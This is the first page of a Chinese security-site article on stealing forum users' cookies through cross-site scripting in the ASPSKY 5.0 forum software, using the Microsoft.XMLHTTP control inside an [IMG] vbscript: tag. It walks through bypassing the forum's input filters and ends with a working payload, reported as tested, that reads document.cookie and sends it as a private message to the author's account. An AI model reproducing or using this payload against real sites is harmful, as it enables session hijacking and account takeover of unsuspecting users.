文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 国产软件 | 国外软件 | 汉化补丁 | 设为首页 | 加入收藏
业界资讯 | 图形图像 | 操作系统 | 网络冲浪 | 工具软件 | 办公软件 | 媒体动画 | 精文荟萃 | 认证考试 | 网站建设 | 技术开发 | 专栏
当前位置:abcdown网络学院网络技术网络安全利用Microsoft.XMLHTTP控件发送COOKIE
精品广告
推荐TOP10
·网吧IP自动修改程序
·Windows权限设置详解
·无线入侵的技术细节
·SQL注入和CSS攻击的检测
·详解:五种Windows常用密码设置
·浅析黑客攻击时的常用方法和攻击步骤
·不怕攻击 家庭上网必学八招安全绝招
·入门者如何获取肉鸡
·Linux安全配置步骤简述
·Wi-Fi网络安全探讨及组网策略
阅读TOP10
·恢复本来面目 消除JPEG图片马赛克
·netcat使用指南
·网吧IP自动修改程序
·Windows权限设置详解
·端口详解(1)-端口分配表
·利用X-scan实现DDoS Ping攻击
·怎样让别人中木马-木马常用骗术大观
·Remote Administrator v2.1 配置文件
·命令行模式改变本地安全策略
·端口详解(2)-端口的分类

利用Microsoft.XMLHTTP控件发送COOKIE

日期:2007年3月10日 作者:清风网络学院 查看:[大字体 中字体 小字体]


(注意由于论坛会对文章中的一些字符作处理,所以最好到
http://www.chinansl.com/czy/xmlhttp.txt看文章
http://www.chinansl.com/czy/aspsky5.htm测试代码)

跨站脚本攻击想必各位都已经是很熟悉了,但是得到COOKIE的时候一直有一个
问题:总是要用WINDOW.OPEN弹一个窗体出来然后发送COOKIE,这样隐秘性
就大打折扣了。以前我想了一个在网页中用insertAdjacentHTML方法来注入HTML语句
的办法勉强可以作到发送COOKIE不出现IE窗口,但是在实际使用中有时会遇到IE出错。

没有更好的办法了吗?以前在研究VBS病毒自动升级的时候用到一个Microsoft.XMLHTTP
控件(该控件是WIN98/2K上都默认自带的东东,并且它是IE认为safe的控件!),通过它我们
可以在网页中给网站发送http请求,可以是POST也可以是GET.

好了思路已经到这儿来,下面我们可以实战一下,我以ASPSKY 5.0 0320为例子。
我们知道<IMG SRC="XXXXXXX">在SRC中可以写入vbscript:这样的语句。。比如
<img src="vbscript:a=(msgbox(now))">,但是我们只能执行一个语句,比如
<img src="vbscript:a=(msgbox(now)):b=(msgbox(now))">这样都将是错误的!
怎么办法呢?在VBS中我们可以用EXECUTE语句,在JS中我们可以使用EVAL语!
比如:<img src="vbscript:execute("a=(msgbox(now)):b=(msgbox("czy""))")">
或是<img src="javascript:eval('alert(\'nsfocus\');alert(\'czy\')')">

还没有晕吧?上面你可能会注意到用VBS的execute语句时双引号要换为"这是因为:
在VBS中单引号要括起字符串,必须是两个单引号代表一个又引号,并且在双引号内!
所以在execute语句中我们不能用单引号,而直接用"呢,在HTML进行引号匹配的时候
会和src="后的引号匹配,所以我们只能用"代替了。

引号的问题解决了,在实际应用中ASPSKY还会对我们的代码进行处理:
1:如果发现script字串,会在前面加上一个空格
2:如果发现http字串会认为是一个URL,并在两边加上<A>元素
3:如果发现空格会用 代替

解决问题:
1:vbscript用vbsCript代替
2:http用,""ht""+""tp...代替(vbs中引号括引号里面的应用多一对,+代表连接符)
3:空格用 代替(注不是)

在最后就是发送COOKIE的问题:
1:控件在本地可以GET,POST任意的网站,但是在网页中竟然只能
GET,POST当前服务器。。。。要不然IE就会说拒绝仿问!
2:cookie中不能有&等在URL中有特殊交意的字符

解决问题:

1:只能发给当前服务器,那么可以把COOKIE发到你在论坛上的注册的用户的邮箱嘛:)
2:replace(document.cookie,""&"",""-""),在vbs中用
replace替换函用,在例子中我把"&"换成了"-"

问题都解决了下面是实际的例子:
动网aspsky 5.0 0320测试成功

//----------------------

[IMG]vbsCript:execute("dat=replace(document.cookie,""&"",""-""):set http=createobject(""Microsoft.XMLHTTP""):http.open ""GET"",""ht""+""tp://www.hd315.gov.cn/gcs/19qu/
yanqing/bbs/usersms.asp?action=send&touser=czy&title=news&submit=发送&message=""&dat,false:http.send")[/IMG]

说明:把COOKIE发给CZY用户,邮件标题叫news

[1] [2] [3] 下一页 

上一篇:IE Object Data Remote Execution Vulnerability

下一篇:网吧十大漏洞曝光


相关软件: 相关文章:
·《二战狙击手:胜利的召唤》全攻略 - 游戏攻略
·C#中利用process类调用外部程序以及执行dos命令
·英杰传3——毛利元就
·镜像文件编辑制作的新利器—ISO Commander
·WEB打印设置解决方案二(利用ScriptX.cab控件改变IE打印设置)
·利用.net反射动态调用指定程序集的中的方法
·利用word将PDF转换DOC文件的方法

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.abcdown.net
首页 | 本站声明 | 下载帮助 | 发布软件 |
中文版权所有:ABC学院 浙ICP备05000717号